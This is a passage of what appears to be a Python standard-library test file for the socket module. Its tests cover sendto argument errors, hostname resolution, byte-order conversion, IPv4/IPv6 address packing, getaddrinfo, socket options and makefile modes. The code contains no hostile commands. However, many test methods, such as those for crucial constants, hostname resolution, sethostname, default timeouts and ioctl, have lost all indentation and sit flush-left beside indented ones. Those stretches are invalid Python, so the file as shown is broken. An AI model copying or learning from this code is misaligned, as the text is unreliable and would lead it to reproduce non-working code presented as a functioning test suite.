        """sendto() must surface argument errors instead of masking them.

        See issue #10169.
        """
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.addCleanup(s.close)
        s.bind(('', 0))
        sockname = s.getsockname()
        # 2 args
        with self.assertRaises(TypeError) as cm:
            s.sendto('\u2620', sockname)
        self.assertEqual(str(cm.exception),
                         "a bytes-like object is required, not 'str'")
        with self.assertRaises(TypeError) as cm:
            s.sendto(5j, sockname)
        self.assertEqual(str(cm.exception),
                         "a bytes-like object is required, not 'complex'")
        with self.assertRaises(TypeError) as cm:
            s.sendto(b'foo', None)
        self.assertIn('not NoneType',str(cm.exception))
        # 3 args
        with self.assertRaises(TypeError) as cm:
            s.sendto('\u2620', 0, sockname)
        self.assertEqual(str(cm.exception),
                         "a bytes-like object is required, not 'str'")
        with self.assertRaises(TypeError) as cm:
            s.sendto(5j, 0, sockname)
        self.assertEqual(str(cm.exception),
                         "a bytes-like object is required, not 'complex'")
        with self.assertRaises(TypeError) as cm:
            s.sendto(b'foo', 0, None)
        self.assertIn('not NoneType', str(cm.exception))
        with self.assertRaises(TypeError) as cm:
            s.sendto(b'foo', 'bar', sockname)
        self.assertIn('an integer is required', str(cm.exception))
        with self.assertRaises(TypeError) as cm:
            s.sendto(b'foo', None, None)
        self.assertIn('an integer is required', str(cm.exception))
        # wrong number of args
        with self.assertRaises(TypeError) as cm:
            s.sendto(b'foo')
        self.assertIn('(1 given)', str(cm.exception))
        with self.assertRaises(TypeError) as cm:
            s.sendto(b'foo', 0, sockname, 4)
        self.assertIn('(4 given)', str(cm.exception))
def testCrucialConstants(self):
# Testing for mission critical constants
socket.AF_INET
socket.SOCK_STREAM
socket.SOCK_DGRAM
socket.SOCK_RAW
socket.SOCK_RDM
socket.SOCK_SEQPACKET
socket.SOL_SOCKET
socket.SO_REUSEADDR
def testHostnameRes(self):
# Testing hostname resolution mechanisms
hostname = socket.gethostname()
try:
ip = socket.gethostbyname(hostname)
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertTrue(ip.find('.') >= 0, "Error resolving host to ip.")
try:
hname, aliases, ipaddrs = socket.gethostbyaddr(ip)
except OSError:
# Probably a similar problem as above; skip this test
self.skipTest('name lookup failure')
all_host_names = [hostname, hname] + aliases
fqhn = socket.getfqdn(ip)
if not fqhn in all_host_names:
self.fail("Error testing host resolution mechanisms. (fqdn: %s, all: %s)" % (fqhn, repr(all_host_names)))
    def test_host_resolution(self):
        """Numeric IPv4 addresses resolve to themselves."""
        for addr in [support.HOSTv4, '10.0.0.1', '255.255.255.255']:
            self.assertEqual(socket.gethostbyname(addr), addr)
        # we don't test support.HOSTv6 because there's a chance it doesn't have
        # a matching name entry (e.g. 'ip6-localhost')
        for host in [support.HOSTv4]:
            self.assertIn(host, socket.gethostbyaddr(host)[2])
    def test_host_resolution_bad_address(self):
        """Malformed IP addresses must not resolve."""
        # These are all malformed IP addresses and expected not to resolve to
        # any result. But some ISPs, e.g. AWS, may successfully resolve these
        # IPs.
        explanation = (
            "resolving an invalid IP address did not raise OSError; "
            "can be caused by a broken DNS server"
        )
        for addr in ['0.1.1.~1', '1+.1.1.1', '::1q', '::1::2',
                     '1:1:1:1:1:1:1:1:1']:
            with self.assertRaises(OSError, msg=addr):
                socket.gethostbyname(addr)
            with self.assertRaises(OSError, msg=explanation):
                socket.gethostbyaddr(addr)
@unittest.skipUnless(hasattr(socket, 'sethostname'), "test needs socket.sethostname()")
@unittest.skipUnless(hasattr(socket, 'gethostname'), "test needs socket.gethostname()")
def test_sethostname(self):
oldhn = socket.gethostname()
try:
socket.sethostname('new')
except OSError as e:
if e.errno == errno.EPERM:
self.skipTest("test should be run as root")
else:
raise
try:
# running test as root!
self.assertEqual(socket.gethostname(), 'new')
# Should work with bytes objects too
socket.sethostname(b'bar')
self.assertEqual(socket.gethostname(), 'bar')
finally:
socket.sethostname(oldhn)
    @unittest.skipUnless(hasattr(socket, 'if_nameindex'),
                         'socket.if_nameindex() not available.')
    def testInterfaceNameIndex(self):
        """if_nameindex() entries round-trip through name<->index lookups."""
        interfaces = socket.if_nameindex()
        for index, name in interfaces:
            self.assertIsInstance(index, int)
            self.assertIsInstance(name, str)
            # interface indices are non-zero integers
            self.assertGreater(index, 0)
            _index = socket.if_nametoindex(name)
            self.assertIsInstance(_index, int)
            self.assertEqual(index, _index)
            _name = socket.if_indextoname(index)
            self.assertIsInstance(_name, str)
            self.assertEqual(name, _name)
    @unittest.skipUnless(hasattr(socket, 'if_nameindex'),
                         'socket.if_nameindex() not available.')
    def testInvalidInterfaceNameIndex(self):
        """Bad interface names/indices raise OSError; bad types raise TypeError."""
        # test nonexistent interface index/name
        self.assertRaises(OSError, socket.if_indextoname, 0)
        self.assertRaises(OSError, socket.if_nametoindex, '_DEADBEEF')
        # test with invalid values
        self.assertRaises(TypeError, socket.if_nametoindex, 0)
        self.assertRaises(TypeError, socket.if_indextoname, '_DEADBEEF')
    @unittest.skipUnless(hasattr(sys, 'getrefcount'),
                         'test needs sys.getrefcount()')
    def testRefCountGetNameInfo(self):
        """getnameinfo() must not leak a reference on a bad argument."""
        try:
            # On some versions, this loses a reference
            orig = sys.getrefcount(__name__)
            # Passing a str instead of an address tuple raises TypeError.
            socket.getnameinfo(__name__,0)
        except TypeError:
            if sys.getrefcount(__name__) != orig:
                self.fail("socket.getnameinfo loses a reference")
    def testInterpreterCrash(self):
        """getnameinfo() with a bad address tuple must not crash the interpreter."""
        try:
            # On some versions, this crashes the interpreter.
            socket.getnameinfo(('x', 0, 0, 0), 0)
        except OSError:
            pass
    def testNtoH(self):
        """htons/ntohs and htonl/ntohl are self-inverse on their low bits."""
        # This just checks that htons etc. are their own inverse,
        # when looking at the lower 16 or 32 bits.
        sizes = {socket.htonl: 32, socket.ntohl: 32,
                 socket.htons: 16, socket.ntohs: 16}
        for func, size in sizes.items():
            mask = (1<<size) - 1
            for i in (0, 1, 0xffff, ~0xffff, 2, 0x01234567, 0x76543210):
                self.assertEqual(i & mask, func(func(i&mask)) & mask)
            # All-ones stays all-ones under byte swapping.
            swapped = func(mask)
            self.assertEqual(swapped & mask, mask)
            # Values too large for the field must raise OverflowError.
            self.assertRaises(OverflowError, func, 1<<34)
    @support.cpython_only
    def testNtoHErrors(self):
        """Boundary values for htons/ntohs/htonl/ntohl: accept, overflow, deprecate."""
        import _testcapi
        s_good_values = [0, 1, 2, 0xffff]
        l_good_values = s_good_values + [0xffffffff]
        l_bad_values = [-1, -2, 1<<32, 1<<1000]
        s_bad_values = l_bad_values + [_testcapi.INT_MIN - 1,
                                       _testcapi.INT_MAX + 1]
        # Values that fit in an int but not 16 bits warn (deprecation path).
        s_deprecated_values = [1<<16, _testcapi.INT_MAX]
        for k in s_good_values:
            socket.ntohs(k)
            socket.htons(k)
        for k in l_good_values:
            socket.ntohl(k)
            socket.htonl(k)
        for k in s_bad_values:
            self.assertRaises(OverflowError, socket.ntohs, k)
            self.assertRaises(OverflowError, socket.htons, k)
        for k in l_bad_values:
            self.assertRaises(OverflowError, socket.ntohl, k)
            self.assertRaises(OverflowError, socket.htonl, k)
        for k in s_deprecated_values:
            self.assertWarns(DeprecationWarning, socket.ntohs, k)
            self.assertWarns(DeprecationWarning, socket.htons, k)
    def testGetServBy(self):
        """getservbyname()/getservbyport() agree for a known service."""
        eq = self.assertEqual
        # Find one service that exists, then check all the related interfaces.
        # I've ordered this by protocols that have both a tcp and udp
        # protocol, at least for modern Linuxes.
        if (sys.platform.startswith(('freebsd', 'netbsd', 'gnukfreebsd'))
            or sys.platform in ('linux', 'darwin')):
            # avoid the 'echo' service on this platform, as there is an
            # assumption breaking non-standard port/protocol entry
            services = ('daytime', 'qotd', 'domain')
        else:
            services = ('echo', 'daytime', 'domain')
        for service in services:
            try:
                port = socket.getservbyname(service, 'tcp')
                break
            except OSError:
                pass
        else:
            # No candidate service resolved at all.
            raise OSError
        # Try same call with optional protocol omitted
        # Issue #26936: Android getservbyname() was broken before API 23.
        if (not hasattr(sys, 'getandroidapilevel') or
                sys.getandroidapilevel() >= 23):
            port2 = socket.getservbyname(service)
            eq(port, port2)
        # Try udp, but don't barf if it doesn't exist
        try:
            udpport = socket.getservbyname(service, 'udp')
        except OSError:
            udpport = None
        else:
            eq(udpport, port)
        # Now make sure the lookup by port returns the same service name
        # Issue #26936: Android getservbyport() is broken.
        if not support.is_android:
            eq(socket.getservbyport(port2), service)
        eq(socket.getservbyport(port, 'tcp'), service)
        if udpport is not None:
            eq(socket.getservbyport(udpport, 'udp'), service)
        # Make sure getservbyport does not accept out of range ports.
        self.assertRaises(OverflowError, socket.getservbyport, -1)
        self.assertRaises(OverflowError, socket.getservbyport, 65536)
def testDefaultTimeout(self):
# Testing default timeout
# The default timeout should initially be None
self.assertEqual(socket.getdefaulttimeout(), None)
s = socket.socket()
self.assertEqual(s.gettimeout(), None)
s.close()
# Set the default timeout to 10, and see if it propagates
socket.setdefaulttimeout(10)
self.assertEqual(socket.getdefaulttimeout(), 10)
s = socket.socket()
self.assertEqual(s.gettimeout(), 10)
s.close()
# Reset the default timeout to None, and see if it propagates
socket.setdefaulttimeout(None)
self.assertEqual(socket.getdefaulttimeout(), None)
s = socket.socket()
self.assertEqual(s.gettimeout(), None)
s.close()
# Check that setting it to an invalid value raises ValueError
self.assertRaises(ValueError, socket.setdefaulttimeout, -1)
# Check that setting it to an invalid type raises TypeError
self.assertRaises(TypeError, socket.setdefaulttimeout, "spam")
@unittest.skipUnless(hasattr(socket, 'inet_aton'),
'test needs socket.inet_aton()')
def testIPv4_inet_aton_fourbytes(self):
# Test that issue1008086 and issue767150 are fixed.
# It must return 4 bytes.
self.assertEqual(b'\x00'*4, socket.inet_aton('0.0.0.0'))
self.assertEqual(b'\xff'*4, socket.inet_aton('255.255.255.255'))
    @unittest.skipUnless(hasattr(socket, 'inet_pton'),
                         'test needs socket.inet_pton()')
    def testIPv4toString(self):
        """inet_aton() and inet_pton(AF_INET) pack dotted-quad strings."""
        from socket import inet_aton as f, inet_pton, AF_INET
        g = lambda a: inet_pton(AF_INET, a)
        assertInvalid = lambda func,a: self.assertRaises(
            (OSError, ValueError), func, a
        )

        self.assertEqual(b'\x00\x00\x00\x00', f('0.0.0.0'))
        self.assertEqual(b'\xff\x00\xff\x00', f('255.0.255.0'))
        self.assertEqual(b'\xaa\xaa\xaa\xaa', f('170.170.170.170'))
        self.assertEqual(b'\x01\x02\x03\x04', f('1.2.3.4'))
        self.assertEqual(b'\xff\xff\xff\xff', f('255.255.255.255'))
        # bpo-29972: inet_pton() doesn't fail on AIX
        if not sys.platform.startswith('aix'):
            assertInvalid(f, '0.0.0.')
        assertInvalid(f, '300.0.0.0')
        assertInvalid(f, 'a.0.0.0')
        assertInvalid(f, '1.2.3.4.5')
        assertInvalid(f, '::1')

        # Same checks via inet_pton(AF_INET, ...).
        self.assertEqual(b'\x00\x00\x00\x00', g('0.0.0.0'))
        self.assertEqual(b'\xff\x00\xff\x00', g('255.0.255.0'))
        self.assertEqual(b'\xaa\xaa\xaa\xaa', g('170.170.170.170'))
        self.assertEqual(b'\xff\xff\xff\xff', g('255.255.255.255'))
        assertInvalid(g, '0.0.0.')
        assertInvalid(g, '300.0.0.0')
        assertInvalid(g, 'a.0.0.0')
        assertInvalid(g, '1.2.3.4.5')
        assertInvalid(g, '::1')
    @unittest.skipUnless(hasattr(socket, 'inet_pton'),
                         'test needs socket.inet_pton()')
    def testIPv6toString(self):
        """inet_pton(AF_INET6) packs valid IPv6 text and rejects bad forms."""
        try:
            from socket import inet_pton, AF_INET6, has_ipv6
            if not has_ipv6:
                self.skipTest('IPv6 not available')
        except ImportError:
            self.skipTest('could not import needed symbols from socket')

        if sys.platform == "win32":
            try:
                inet_pton(AF_INET6, '::')
            except OSError as e:
                # WSAEINVAL: IPv6 stack may be absent on this Windows.
                if e.winerror == 10022:
                    self.skipTest('IPv6 might not be supported')

        f = lambda a: inet_pton(AF_INET6, a)
        assertInvalid = lambda a: self.assertRaises(
            (OSError, ValueError), f, a
        )

        self.assertEqual(b'\x00' * 16, f('::'))
        self.assertEqual(b'\x00' * 16, f('0::0'))
        self.assertEqual(b'\x00\x01' + b'\x00' * 14, f('1::'))
        self.assertEqual(
            b'\x45\xef\x76\xcb\x00\x1a\x56\xef\xaf\xeb\x0b\xac\x19\x24\xae\xae',
            f('45ef:76cb:1a:56ef:afeb:bac:1924:aeae')
        )
        self.assertEqual(
            b'\xad\x42\x0a\xbc' + b'\x00' * 4 + b'\x01\x27\x00\x00\x02\x54\x00\x02',
            f('ad42:abc::127:0:254:2')
        )
        self.assertEqual(b'\x00\x12\x00\x0a' + b'\x00' * 12, f('12:a::'))
        # Malformed forms: bad digits, stray colons, too many groups.
        assertInvalid('0x20::')
        assertInvalid(':::')
        assertInvalid('::0::')
        assertInvalid('1::abc::')
        assertInvalid('1::abc::def')
        assertInvalid('1:2:3:4:5:6')
        assertInvalid('1:2:3:4:5:6:7:8:0')
        # bpo-29972: inet_pton() doesn't fail on AIX
        if not sys.platform.startswith('aix'):
            assertInvalid('1:2:3:4:5:6:')
            assertInvalid('1:2:3:4:5:6:7:8:')

        # Embedded dotted-quad IPv4 forms.
        self.assertEqual(b'\x00' * 12 + b'\xfe\x2a\x17\x40',
            f('::254.42.23.64')
        )
        self.assertEqual(
            b'\x00\x42' + b'\x00' * 8 + b'\xa2\x9b\xfe\x2a\x17\x40',
            f('42::a29b:254.42.23.64')
        )
        self.assertEqual(
            b'\x00\x42\xa8\xb9\x00\x00\x00\x02\xff\xff\xa2\x9b\xfe\x2a\x17\x40',
            f('42:a8b9:0:2:ffff:a29b:254.42.23.64')
        )
        assertInvalid('255.254.253.252')
        assertInvalid('1::260.2.3.0')
        assertInvalid('1::0.be.e.0')
        assertInvalid('1:2:3:4:5:6:7:1.2.3.4')
        assertInvalid('::1.2.3.4:0')
        assertInvalid('0.100.200.0:3:4:5:6:7:8')
    @unittest.skipUnless(hasattr(socket, 'inet_ntop'),
                         'test needs socket.inet_ntop()')
    def testStringToIPv4(self):
        """inet_ntoa() and inet_ntop(AF_INET) unpack 4-byte addresses."""
        from socket import inet_ntoa as f, inet_ntop, AF_INET
        g = lambda a: inet_ntop(AF_INET, a)
        assertInvalid = lambda func,a: self.assertRaises(
            (OSError, ValueError), func, a
        )

        self.assertEqual('1.0.1.0', f(b'\x01\x00\x01\x00'))
        self.assertEqual('170.85.170.85', f(b'\xaa\x55\xaa\x55'))
        self.assertEqual('255.255.255.255', f(b'\xff\xff\xff\xff'))
        self.assertEqual('1.2.3.4', f(b'\x01\x02\x03\x04'))
        # Anything other than exactly 4 bytes is invalid.
        assertInvalid(f, b'\x00' * 3)
        assertInvalid(f, b'\x00' * 5)
        assertInvalid(f, b'\x00' * 16)
        # bytearray input is accepted too.
        self.assertEqual('170.85.170.85', f(bytearray(b'\xaa\x55\xaa\x55')))

        self.assertEqual('1.0.1.0', g(b'\x01\x00\x01\x00'))
        self.assertEqual('170.85.170.85', g(b'\xaa\x55\xaa\x55'))
        self.assertEqual('255.255.255.255', g(b'\xff\xff\xff\xff'))
        assertInvalid(g, b'\x00' * 3)
        assertInvalid(g, b'\x00' * 5)
        assertInvalid(g, b'\x00' * 16)
        self.assertEqual('170.85.170.85', g(bytearray(b'\xaa\x55\xaa\x55')))
    @unittest.skipUnless(hasattr(socket, 'inet_ntop'),
                         'test needs socket.inet_ntop()')
    def testStringToIPv6(self):
        """inet_ntop(AF_INET6) unpacks 16-byte addresses and rejects bad sizes."""
        try:
            from socket import inet_ntop, AF_INET6, has_ipv6
            if not has_ipv6:
                self.skipTest('IPv6 not available')
        except ImportError:
            self.skipTest('could not import needed symbols from socket')

        if sys.platform == "win32":
            try:
                inet_ntop(AF_INET6, b'\x00' * 16)
            except OSError as e:
                # WSAEINVAL: IPv6 stack may be absent on this Windows.
                if e.winerror == 10022:
                    self.skipTest('IPv6 might not be supported')

        f = lambda a: inet_ntop(AF_INET6, a)
        assertInvalid = lambda a: self.assertRaises(
            (OSError, ValueError), f, a
        )

        self.assertEqual('::', f(b'\x00' * 16))
        self.assertEqual('::1', f(b'\x00' * 15 + b'\x01'))
        self.assertEqual(
            'aef:b01:506:1001:ffff:9997:55:170',
            f(b'\x0a\xef\x0b\x01\x05\x06\x10\x01\xff\xff\x99\x97\x00\x55\x01\x70')
        )
        # bytearray input is accepted too.
        self.assertEqual('::1', f(bytearray(b'\x00' * 15 + b'\x01')))

        # Anything other than exactly 16 bytes is invalid.
        assertInvalid(b'\x12' * 15)
        assertInvalid(b'\x12' * 17)
        assertInvalid(b'\x12' * 4)
# XXX The following don't test module-level functionality...
    def testSockName(self):
        """getsockname() reflects the address and port the socket was bound to."""
        port = support.find_unused_port()
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.addCleanup(sock.close)
        sock.bind(("0.0.0.0", port))
        name = sock.getsockname()
        # XXX(nnorwitz): http://tinyurl.com/os5jz seems to indicate
        # it reasonable to get the host's addr in addition to 0.0.0.0.
        # At least for eCos.  This is required for the S/390 to pass.
        try:
            my_ip_addr = socket.gethostbyname(socket.gethostname())
        except OSError:
            # Probably name lookup wasn't set up right; skip this test
            self.skipTest('name lookup failure')
        self.assertIn(name[0], ("0.0.0.0", my_ip_addr), '%s invalid' % name[0])
        self.assertEqual(name[1], port)
def testGetSockOpt(self):
# Testing getsockopt()
# We know a socket should start without reuse==0
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse != 0, "initial mode is reuse")
def testSetSockOpt(self):
# Testing setsockopt()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse == 0, "failed to set reuse mode")
def testSendAfterClose(self):
# testing send() after close() with timeout
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(1)
sock.close()
self.assertRaises(OSError, sock.send, b"spam")
    def testCloseException(self):
        """close() raises EBADF/ENOTSOCK when the fd was already closed."""
        sock = socket.socket()
        sock.bind((socket._LOCALHOST, 0))
        # Wrapping the same fd and closing the wrapper closes the fd out
        # from under the original socket object.
        socket.socket(fileno=sock.fileno()).close()
        try:
            sock.close()
        except OSError as err:
            # Winsock apparently raises ENOTSOCK
            self.assertIn(err.errno, (errno.EBADF, errno.ENOTSOCK))
        else:
            self.fail("close() should raise EBADF/ENOTSOCK")
    def testNewAttributes(self):
        """The .family, .type and .proto attributes report creation arguments."""
        # testing .family, .type and .protocol
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.assertEqual(sock.family, socket.AF_INET)
        if hasattr(socket, 'SOCK_CLOEXEC'):
            # On platforms with SOCK_CLOEXEC the flag may be OR-ed into type.
            self.assertIn(sock.type,
                          (socket.SOCK_STREAM | socket.SOCK_CLOEXEC,
                           socket.SOCK_STREAM))
        else:
            self.assertEqual(sock.type, socket.SOCK_STREAM)
        self.assertEqual(sock.proto, 0)
        sock.close()
    def test_getsockaddrarg(self):
        """bind() rejects out-of-range port numbers with OverflowError."""
        sock = socket.socket()
        self.addCleanup(sock.close)
        port = support.find_unused_port()
        big_port = port + 65536
        neg_port = port - 65536
        self.assertRaises(OverflowError, sock.bind, (HOST, big_port))
        self.assertRaises(OverflowError, sock.bind, (HOST, neg_port))
        # Since find_unused_port() is inherently subject to race conditions, we
        # call it a couple times if necessary.
        for i in itertools.count():
            port = support.find_unused_port()
            try:
                sock.bind((HOST, port))
            except OSError as e:
                # Retry up to five times if someone grabbed the port first.
                if e.errno != errno.EADDRINUSE or i == 5:
                    raise
            else:
                break
@unittest.skipUnless(os.name == "nt", "Windows specific")
def test_sock_ioctl(self):
self.assertTrue(hasattr(socket.socket, 'ioctl'))
self.assertTrue(hasattr(socket, 'SIO_RCVALL'))
self.assertTrue(hasattr(socket, 'RCVALL_ON'))
self.assertTrue(hasattr(socket, 'RCVALL_OFF'))
self.assertTrue(hasattr(socket, 'SIO_KEEPALIVE_VALS'))
s = socket.socket()
self.addCleanup(s.close)
self.assertRaises(ValueError, s.ioctl, -1, None)
s.ioctl(socket.SIO_KEEPALIVE_VALS, (1, 100, 100))
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(hasattr(socket, 'SIO_LOOPBACK_FAST_PATH'),
'Loopback fast path support required for this test')
def test_sio_loopback_fast_path(self):
s = socket.socket()
self.addCleanup(s.close)
try:
s.ioctl(socket.SIO_LOOPBACK_FAST_PATH, True)
except OSError as exc:
WSAEOPNOTSUPP = 10045
if exc.winerror == WSAEOPNOTSUPP:
self.skipTest("SIO_LOOPBACK_FAST_PATH is defined but "
"doesn't implemented in this Windows version")
raise
self.assertRaises(TypeError, s.ioctl, socket.SIO_LOOPBACK_FAST_PATH, None)
    def testGetaddrinfo(self):
        """Exercise getaddrinfo() positional, keyword, and filter arguments."""
        try:
            socket.getaddrinfo('localhost', 80)
        except socket.gaierror as err:
            if err.errno == socket.EAI_SERVICE:
                # see http://bugs.python.org/issue1282647
                self.skipTest("buggy libc version")
            raise
        # len of every sequence is supposed to be == 5
        for info in socket.getaddrinfo(HOST, None):
            self.assertEqual(len(info), 5)
        # host can be a domain name, a string representation of an
        # IPv4/v6 address or None
        socket.getaddrinfo('localhost', 80)
        socket.getaddrinfo('127.0.0.1', 80)
        socket.getaddrinfo(None, 80)
        if support.IPV6_ENABLED:
            socket.getaddrinfo('::1', 80)
        # port can be a string service name such as "http", a numeric
        # port number or None
        # Issue #26936: Android getaddrinfo() was broken before API level 23.
        if (not hasattr(sys, 'getandroidapilevel') or
                sys.getandroidapilevel() >= 23):
            socket.getaddrinfo(HOST, "http")
        socket.getaddrinfo(HOST, 80)
        socket.getaddrinfo(HOST, None)
        # test family and socktype filters
        infos = socket.getaddrinfo(HOST, 80, socket.AF_INET, socket.SOCK_STREAM)
        for family, type, _, _, _ in infos:
            self.assertEqual(family, socket.AF_INET)
            self.assertEqual(str(family), 'AddressFamily.AF_INET')
            self.assertEqual(type, socket.SOCK_STREAM)
            self.assertEqual(str(type), 'SocketKind.SOCK_STREAM')
        infos = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
        for _, socktype, _, _, _ in infos:
            self.assertEqual(socktype, socket.SOCK_STREAM)
        # test proto and flags arguments
        socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
        socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
        # a server willing to support both IPv4 and IPv6 will
        # usually do this
        socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
                           socket.AI_PASSIVE)
        # test keyword arguments
        a = socket.getaddrinfo(HOST, None)
        b = socket.getaddrinfo(host=HOST, port=None)
        self.assertEqual(a, b)
        a = socket.getaddrinfo(HOST, None, socket.AF_INET)
        b = socket.getaddrinfo(HOST, None, family=socket.AF_INET)
        self.assertEqual(a, b)
        a = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
        b = socket.getaddrinfo(HOST, None, type=socket.SOCK_STREAM)
        self.assertEqual(a, b)
        a = socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
        b = socket.getaddrinfo(HOST, None, proto=socket.SOL_TCP)
        self.assertEqual(a, b)
        a = socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
        b = socket.getaddrinfo(HOST, None, flags=socket.AI_PASSIVE)
        self.assertEqual(a, b)
        a = socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
                               socket.AI_PASSIVE)
        b = socket.getaddrinfo(host=None, port=0, family=socket.AF_UNSPEC,
                               type=socket.SOCK_STREAM, proto=0,
                               flags=socket.AI_PASSIVE)
        self.assertEqual(a, b)
        # Issue #6697.
        self.assertRaises(UnicodeEncodeError, socket.getaddrinfo, 'localhost', '\uD800')
        # Issue 17269: test workaround for OS X platform bug segfault
        if hasattr(socket, 'AI_NUMERICSERV'):
            try:
                # The arguments here are undefined and the call may succeed
                # or fail.  All we care here is that it doesn't segfault.
                socket.getaddrinfo("localhost", None, 0, 0, 0,
                                   socket.AI_NUMERICSERV)
            except socket.gaierror:
                pass
def test_getnameinfo(self):
# only IP addresses are allowed
self.assertRaises(OSError, socket.getnameinfo, ('mail.python.org',0), 0)
    @unittest.skipUnless(support.is_resource_enabled('network'),
                         'network is not enabled')
    def test_idna(self):
        """Non-ASCII (IDNA) domain names work in resolution functions."""
        # Check for internet access before running test
        # (issue #12804, issue #25138).
        with support.transient_internet('python.org'):
            socket.gethostbyname('python.org')

        # these should all be successful
        domain = 'испытание.pythontest.net'
        socket.gethostbyname(domain)
        socket.gethostbyname_ex(domain)
        socket.getaddrinfo(domain,0,socket.AF_UNSPEC,socket.SOCK_STREAM)
        # this may not work if the forward lookup chooses the IPv6 address, as that doesn't
        # have a reverse entry yet
        # socket.gethostbyaddr('испытание.python.org')
    def check_sendall_interrupted(self, with_timeout):
        """Helper: verify sendall() behavior when interrupted by a signal.

        With with_timeout=False, an exception raised by the signal handler
        must propagate out of sendall(); with with_timeout=True, a benign
        handler must let the pending timeout fire instead.
        """
        # socketpair() is not strictly required, but it makes things easier.
        if not hasattr(signal, 'alarm') or not hasattr(socket, 'socketpair'):
            self.skipTest("signal.alarm and socket.socketpair required for this test")
        # Our signal handlers clobber the C errno by calling a math function
        # with an invalid domain value.
        def ok_handler(*args):
            self.assertRaises(ValueError, math.acosh, 0)
        def raising_handler(*args):
            self.assertRaises(ValueError, math.acosh, 0)
            # Deliberately raise ZeroDivisionError from the handler.
            1 // 0
        c, s = socket.socketpair()
        old_alarm = signal.signal(signal.SIGALRM, raising_handler)
        try:
            if with_timeout:
                # Just above the one second minimum for signal.alarm
                c.settimeout(1.5)
            with self.assertRaises(ZeroDivisionError):
                signal.alarm(1)
                c.sendall(b"x" * support.SOCK_MAX_SIZE)
            if with_timeout:
                signal.signal(signal.SIGALRM, ok_handler)
                signal.alarm(1)
                self.assertRaises(socket.timeout, c.sendall,
                                  b"x" * support.SOCK_MAX_SIZE)
        finally:
            # Cancel any pending alarm and restore the previous handler.
            signal.alarm(0)
            signal.signal(signal.SIGALRM, old_alarm)
            c.close()
            s.close()
    def test_sendall_interrupted(self):
        # Signal arrives during sendall() without a socket timeout.
        self.check_sendall_interrupted(False)
    def test_sendall_interrupted_with_timeout(self):
        # Signal arrives during sendall() with a socket timeout set.
        self.check_sendall_interrupted(True)
    def test_dealloc_warn(self):
        """Garbage-collecting an open socket emits a ResourceWarning."""
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        r = repr(sock)
        with self.assertWarns(ResourceWarning) as cm:
            sock = None
            support.gc_collect()
        self.assertIn(r, str(cm.warning.args[0]))
        # An open socket file object gets dereferenced after the socket
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        f = sock.makefile('rb')
        r = repr(sock)
        sock = None
        support.gc_collect()
        # The warning fires only once the file object (last reference to
        # the underlying socket) is collected too.
        with self.assertWarns(ResourceWarning):
            f = None
            support.gc_collect()
    def test_name_closed_socketio(self):
        """repr() of a closed socket file object shows name=-1."""
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
            fp = sock.makefile("rb")
            fp.close()
            self.assertEqual(repr(fp), "<_io.BufferedReader name=-1>")
def test_unusable_closed_socketio(self):
with socket.socket() as sock:
fp = sock.makefile("rb", buffering=0)
self.assertTrue(fp.readable())
self.assertFalse(fp.writable())
self.assertFalse(fp.seekable())
fp.close()
self.assertRaises(ValueError, fp.readable)
self.assertRaises(ValueError, fp.writable)
self.assertRaises(ValueError, fp.seekable)
    def test_socket_close(self):
        """Module-level socket.close() closes an fd; bad fds raise."""
        sock = socket.socket()
        try:
            sock.bind((HOST, 0))
            # Close the underlying fd directly, behind the object's back.
            socket.close(sock.fileno())
            with self.assertRaises(OSError):
                sock.listen(1)
        finally:
            with self.assertRaises(OSError):
                # sock.close() fails with EBADF
                sock.close()
        with self.assertRaises(TypeError):
            socket.close(None)
        with self.assertRaises(OSError):
            socket.close(-1)
def test_makefile_mode(self):
for mode in 'r', 'rb', 'rw', 'w', 'wb':
with self.subTest(mode=mode):
with socket.socket() as sock:
with sock.makefile(mode) as fp:
self.assertEqual(fp.mode, mode)
def test_makefile_invalid_mode(self):
for mode in 'rt', 'x', '+', 'a':
with self.subTest(mode=mode):
with socket.socket() as sock:
with self.assertRaisesRegex(ValueError, 'invalid mode'):
sock.makefile(mode)
    def test_pickle(self):
        """Sockets are unpicklable, but family/type constants pickle fine."""
        sock = socket.socket()
        with sock:
            for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
                self.assertRaises(TypeError, pickle.dumps, sock, protocol)
        # The IntEnum constants survive a pickle round-trip.
        for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
            family = pickle.loads(pickle.dumps(socket.AF_INET, protocol))
            self.assertEqual(family, socket.AF_INET)
            type = pickle.loads(pickle.dumps(socket.SOCK_STREAM, protocol))
            self.assertEqual(type, socket.SOCK_STREAM)
def test_listen_backlog(self):
for backlog in 0, -1:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen(backlog)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen()
    @support.cpython_only
    def test_listen_backlog_overflow(self):
        """listen() raises OverflowError for backlogs beyond INT_MAX."""
        # Issue 15989
        import _testcapi
